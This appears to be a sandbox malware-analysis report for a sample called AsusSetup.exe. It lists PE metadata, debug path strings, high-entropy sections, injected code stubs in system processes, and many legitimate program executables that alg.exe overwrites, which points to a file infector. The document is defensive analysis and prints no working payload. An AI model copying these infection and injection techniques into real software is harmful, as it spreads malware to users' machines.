Source: C:\Windows\System32\AppVClient.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32
Source: AsusSetup.exe, Static PE information: Virtual size of .text is bigger than: 0x100000
Source: AsusSetup.exe, Static PE information: Image base 0x140000000 > 0x60000000
Source: AsusSetup.exe, Static file information: File size 5251072 > 1048576
Source: AsusSetup.exe, Static PE information: Raw size of .text is bigger than: 0x100000 < 0x203c00
Source: AsusSetup.exe, Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x18d000
Source: AsusSetup.exe, Static PE information: More than 200 imports for USER32.dll
Source: AsusSetup.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000002.00000003.2102454337.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: AsusSetup.exe, 00000000.00000003.1693327541.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000002.00000003.2157726829.0000000001560000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2172626726.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2160809118.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000002.00000003.1800031110.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000002.00000003.1934452647.0000000001650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000002.00000003.1934452647.0000000001650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000002.00000003.1945933565.0000000001650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000002.00000003.2216381785.0000000001610000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2212707992.0000000001610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: AsusSetup.exe, 00000000.00000003.1725048803.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1742417137.00000000016D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: pack200.exe.2.dr
Source: Binary string: D:\GitSourceCode\AsTaskSched\Release\AsTaskSched.pdb source: AsusSetup.exe
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000002.00000003.1834641811.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: F:\SourceCodeTB\SCD_AutoRunSource\AsusSetup\x64\Release\AsusSetup.pdb source: AsusSetup.exe
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000002.00000003.2095082836.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, MSRMSPIBroker.exe.2.dr
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000002.00000003.2196621773.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdb source: msedge_proxy.exe.2.dr
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000002.00000003.2109815107.0000000001620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2121918749.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000002.00000003.1979810912.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000002.00000003.1805970736.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\GitSourceCode\AsTaskSched\x64\Release\AsTaskSched.pdb source: AsusSetup.exe
Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdbOGP source: msedge_proxy.exe.2.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: AsusSetup.exe, 00000000.00000003.1714945382.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000002.00000003.1945933565.0000000001650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb source: AdobeARMHelper.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000002.00000003.1815895137.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000002.00000003.1805970736.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdb source: private_browsing.exe.2.dr
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000002.00000003.2157726829.0000000001560000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2172626726.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2160809118.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000002.00000003.1834641811.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000002.00000003.2000319019.0000000001470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000002.00000003.1800031110.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: alg.exe, 00000002.00000003.2216381785.0000000001610000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2212707992.0000000001610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000002.00000003.1747144791.00000000016D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.2080481353.0000000001490000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000002.00000003.2196621773.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb source: alg.exe, 00000002.00000003.1957415043.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000002.00000003.2057462608.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000002.00000003.1979810912.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000002.00000003.2102454337.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000002.00000003.2000319019.0000000001470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000002.00000003.2065372565.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdbp source: private_browsing.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000002.00000003.2095082836.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, MSRMSPIBroker.exe.2.dr
Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000002.00000003.1747144791.00000000016D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000002.00000003.2109815107.0000000001620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2121918749.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdbr source: AdobeARMHelper.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000002.00000003.2008264771.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: AsusSetup.exe, 00000000.00000003.1698531117.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: minidump-analyzer.pdb source: minidump-analyzer.exe.2.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: AsusSetup.exe, 00000000.00000003.1714945382.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe_x64.pdb source: Aut2exe_x64.exe.2.dr
Source: Binary string: ALG.pdbGCTL source: AsusSetup.exe, 00000000.00000003.1698531117.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: AsusSetup.exe, 00000000.00000003.1725048803.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1742417137.00000000016D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000002.00000003.1815895137.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb22 source: alg.exe, 00000002.00000003.1957415043.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.2.dr
Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000002.00000003.2191374108.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.2065372565.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000002.00000003.2008264771.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000002.00000003.2191374108.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: alg.exe.0.dr, Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
Source: elevation_service.exe0.0.dr, Static PE information: real checksum: 0x1bb29d should be: 0x24280a
Source: armsvc.exe.0.dr, Static PE information: section name: .didat
Source: alg.exe.0.dr, Static PE information: section name: .didat
Source: FXSSVC.exe.0.dr, Static PE information: section name: .didat
Source: elevation_service.exe.0.dr, Static PE information: section name: .00cfg
Source: elevation_service.exe.0.dr, Static PE information: section name: .gxfg
Source: elevation_service.exe.0.dr, Static PE information: section name: .retplne
Source: elevation_service.exe.0.dr, Static PE information: section name: _RDATA
Source: elevation_service.exe.0.dr, Static PE information: section name: malloc_h
Source: elevation_service.exe0.0.dr, Static PE information: section name: .00cfg
Source: elevation_service.exe0.0.dr, Static PE information: section name: .gxfg
Source: elevation_service.exe0.0.dr, Static PE information: section name: .retplne
Source: elevation_service.exe0.0.dr, Static PE information: section name: _RDATA
Source: elevation_service.exe0.0.dr, Static PE information: section name: malloc_h
Source: GoogleUpdateComRegisterShell64.exe.2.dr, Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.2.dr, Static PE information: section name: .gxfg
Source: GoogleUpdateComRegisterShell64.exe.2.dr, Static PE information: section name: .gehcont
Source: unpack200.exe.2.dr, Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.2.dr, Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.2.dr, Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.2.dr, Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.2.dr, Static PE information: section name: _RDATA
Source: cookie_exporter.exe.2.dr, Static PE information: section name: .00cfg
Source: cookie_exporter.exe.2.dr, Static PE information: section name: .gxfg
Source: cookie_exporter.exe.2.dr, Static PE information: section name: .retplne
Source: cookie_exporter.exe.2.dr, Static PE information: section name: _RDATA
Source: identity_helper.exe.2.dr, Static PE information: section name: .00cfg
Source: identity_helper.exe.2.dr, Static PE information: section name: .gxfg
Source: identity_helper.exe.2.dr, Static PE information: section name: .retplne
Source: identity_helper.exe.2.dr, Static PE information: section name: _RDATA
Source: identity_helper.exe.2.dr, Static PE information: section name: malloc_h
Source: setup.exe.2.dr, Static PE information: section name: .00cfg
Source: setup.exe.2.dr, Static PE information: section name: .gxfg
Source: setup.exe.2.dr, Static PE information: section name: .retplne
Source: setup.exe.2.dr, Static PE information: section name: LZMADEC
Source: setup.exe.2.dr, Static PE information: section name: _RDATA
Source: setup.exe.2.dr, Static PE information: section name: malloc_h
Source: msedgewebview2.exe.2.dr, Static PE information: section name: .00cfg
Source: msedgewebview2.exe.2.dr, Static PE information: section name: .gxfg
Source: msedgewebview2.exe.2.dr, Static PE information: section name: .retplne
Source: msedgewebview2.exe.2.dr, Static PE information: section name: CPADinfo
Source: msedgewebview2.exe.2.dr, Static PE information: section name: LZMADEC
Source: msedgewebview2.exe.2.dr, Static PE information: section name: _RDATA
Source: msedgewebview2.exe.2.dr, Static PE information: section name: malloc_h
Source: 117.0.5938.132_chrome_installer.exe.2.dr, Static PE information: section name: .00cfg
Source: 117.0.5938.132_chrome_installer.exe.2.dr, Static PE information: section name: .retplne
Source: Acrobat.exe.2.dr, Static PE information: section name: .didat
Source: Acrobat.exe.2.dr, Static PE information: section name: _RDATA
Source: AcroCEF.exe.2.dr, Static PE information: section name: .didat
Source: AcroCEF.exe.2.dr, Static PE information: section name: _RDATA
Source: msedge_proxy.exe.2.dr, Static PE information: section name: .00cfg
Source: msedge_proxy.exe.2.dr, Static PE information: section name: .gxfg
Source: msedge_proxy.exe.2.dr, Static PE information: section name: .retplne
Source: msedge_proxy.exe.2.dr, Static PE information: section name: _RDATA
Source: msedge_proxy.exe.2.dr, Static PE information: section name: malloc_h
Source: msedge_pwa_launcher.exe.2.dr, Static PE information: section name: .00cfg
Source: msedge_pwa_launcher.exe.2.dr, Static PE information: section name: .gxfg
Source: msedge_pwa_launcher.exe.2.dr, Static PE information: section name: .retplne
Source: msedge_pwa_launcher.exe.2.dr, Static PE information: section name: LZMADEC
Source: msedge_pwa_launcher.exe.2.dr, Static PE information: section name: _RDATA
Source: msedge_pwa_launcher.exe.2.dr, Static PE information: section name: malloc_h
Source: notification_click_helper.exe.2.dr, Static PE information: section name: .00cfg
Source: notification_click_helper.exe.2.dr, Static PE information: section name: .gxfg
Source: notification_click_helper.exe.2.dr, Static PE information: section name: .retplne
Source: notification_click_helper.exe.2.dr, Static PE information: section name: CPADinfo
Source: notification_click_helper.exe.2.dr, Static PE information: section name: _RDATA
Source: notification_click_helper.exe.2.dr, Static PE information: section name: malloc_h
Source: pwahelper.exe.2.dr, Static PE information: section name: .00cfg
Source: pwahelper.exe.2.dr, Static PE information: section name: .gxfg
Source: pwahelper.exe.2.dr, Static PE information: section name: .retplne
Source: pwahelper.exe.2.dr, Static PE information: section name: _RDATA
Source: pwahelper.exe.2.dr, Static PE information: section name: malloc_h
Source: msedge_proxy.exe0.2.dr, Static PE information: section name: .00cfg
Source: msedge_proxy.exe0.2.dr, Static PE information: section name: .gxfg
Source: msedge_proxy.exe0.2.dr, Static PE information: section name: .retplne
Source: msedge_proxy.exe0.2.dr, Static PE information: section name: _RDATA
Source: msedge_proxy.exe0.2.dr, Static PE information: section name: malloc_h
Source: pwahelper.exe0.2.dr, Static PE information: section name: .00cfg
Source: pwahelper.exe0.2.dr, Static PE information: section name: .gxfg
Source: pwahelper.exe0.2.dr, Static PE information: section name: .retplne
Source: pwahelper.exe0.2.dr, Static PE information: section name: _RDATA
Source: pwahelper.exe0.2.dr, Static PE information: section name: malloc_h
Source: MicrosoftEdgeUpdate.exe.2.dr, Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateBroker.exe.2.dr, Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.dr, Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.dr, Static PE information: section name: _RDATA
Source: MicrosoftEdgeUpdateCore.exe.2.dr, Static PE information: section name: .didat
Source: maintenanceservice.exe.2.dr, Static PE information: section name: .00cfg
Source: maintenanceservice.exe.2.dr, Static PE information: section name: .voltbl
Source: maintenanceservice.exe.2.dr, Static PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe.2.dr, Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe.2.dr, Static PE information: section name: _RDATA
Source: AcroCEF.exe0.2.dr, Static PE information: section name: .didat
Source: AcroCEF.exe0.2.dr, Static PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe0.2.dr, Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe0.2.dr, Static PE information: section name: _RDATA
Source: MicrosoftEdgeUpdateOnDemand.exe.2.dr, Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateSetup.exe.2.dr, Static PE information: section name: .didat
Source: AppVLP.exe.2.dr, Static PE information: section name: .c2r
Source: OneDriveSetup.exe.2.dr, Static PE information: section name: .didat
Source: AdobeCollabSync.exe.2.dr, Static PE information: section name: .didat
Source: AdobeCollabSync.exe.2.dr, Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\AsusSetup.exe, Code function: 0_2_020652E3 push E9000001h; retf 0000h 0_2_020652E8
Source: C:\Users\user\Desktop\AsusSetup.exe, Code function: 0_2_020668CE push E9000001h; retn 0000h 0_2_020668D3
Source: C:\Windows\System32\AppVClient.exe, Code function: 6_2_005368CE push E9000001h; retn 0000h 6_2_005368D3
Source: C:\Windows\System32\AppVClient.exe, Code function: 6_2_005352E3 push E9000001h; retf 0000h 6_2_005352E8
Source: C:\Windows\System32\FXSSVC.exe, Code function: 9_2_004268CE push E9000001h; retn 0000h 9_2_004268D3
Source: C:\Windows\System32\FXSSVC.exe, Code function: 9_2_004252E3 push E9000001h; retf 0000h 9_2_004252E8
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Code function: 10_2_022552E3 push E9000001h; retf 0000h 10_2_022552E8
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, Code function: 10_2_022568CE push E9000001h; retn 0000h 10_2_022568D3
Source: AsusSetup.exe, Static PE information: section name: .reloc entropy: 7.909171977386322
Source: AppVClient.exe.0.dr, Static PE information: section name: .reloc entropy: 7.926374761621537
Source: FXSSVC.exe.0.dr, Static PE information: section name: .reloc entropy: 7.932549984616171
Source: elevation_service.exe.0.dr, Static PE information: section name: .reloc entropy: 7.9341222464649634
Source: elevation_service.exe0.0.dr, Static PE information: section name: .reloc entropy: 7.936210613832254
Source: identity_helper.exe.2.dr, Static PE information: section name: .reloc entropy: 7.930826780785252
Source: setup.exe.2.dr, Static PE information: section name: .reloc entropy: 7.934610105064463
Source: msedgewebview2.exe.2.dr, Static PE information: section name: .reloc entropy: 7.9263254044138876
Source: 117.0.5938.132_chrome_installer.exe.2.dr, Static PE information: section name: .reloc entropy: 7.924953306161172
Source: 7zFM.exe.2.dr, Static PE information: section name: .reloc entropy: 7.922154534505765
Source: 7zG.exe.2.dr, Static PE information: section name: .reloc entropy: 7.917653876302211
Source: Acrobat.exe.2.dr, Static PE information: section name: .reloc entropy: 7.930112475265825
Source: AcroCEF.exe.2.dr, Static PE information: section name: .reloc entropy: 7.927047445796815
Source: msedge_proxy.exe.2.dr, Static PE information: section name: .reloc entropy: 7.932362144356526
Source: msedge_pwa_launcher.exe.2.dr, Static PE information: section name: .reloc entropy: 7.936485765877424
Source: notification_click_helper.exe.2.dr, Static PE information: section name: .reloc entropy: 7.934156734794212
Source: pwahelper.exe.2.dr, Static PE information: section name: .reloc entropy: 7.930980815810094
Source: msedge_proxy.exe0.2.dr, Static PE information: section name: .reloc entropy: 7.9323570258946345
Source: pwahelper.exe0.2.dr, Static PE information: section name: .reloc entropy: 7.930982968179109
Source: SingleClientServicesUpdater.exe.2.dr, Static PE information: section name: .reloc entropy: 7.934064267523334
Source: AcroCEF.exe0.2.dr, Static PE information: section name: .reloc entropy: 7.927041121094228
Source: SingleClientServicesUpdater.exe0.2.dr, Static PE information: section name: .reloc entropy: 7.934056927244927
Source: MicrosoftEdgeUpdateSetup.exe.2.dr, Static PE information: section name: .reloc entropy: 7.930261900063056
Source: OneDriveSetup.exe.2.dr, Static PE information: section name: .reloc entropy: 7.86238024239603
Source: ADNotificationManager.exe.2.dr, Static PE information: section name: .reloc entropy: 7.927064915263811
Source: AdobeCollabSync.exe.2.dr, Static PE information: section name: .reloc entropy: 7.894424384142644
Source: CRLogTransport.exe.2.dr, Static PE information: section name: .reloc entropy: 7.928168502137922

Persistence and Installation Behavior

Source: C:\Windows\System32\alg.exe, File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\26169d80e67cd874.bin
Source: C:\Users\user\Desktop\AsusSetup.exe, File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe, File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
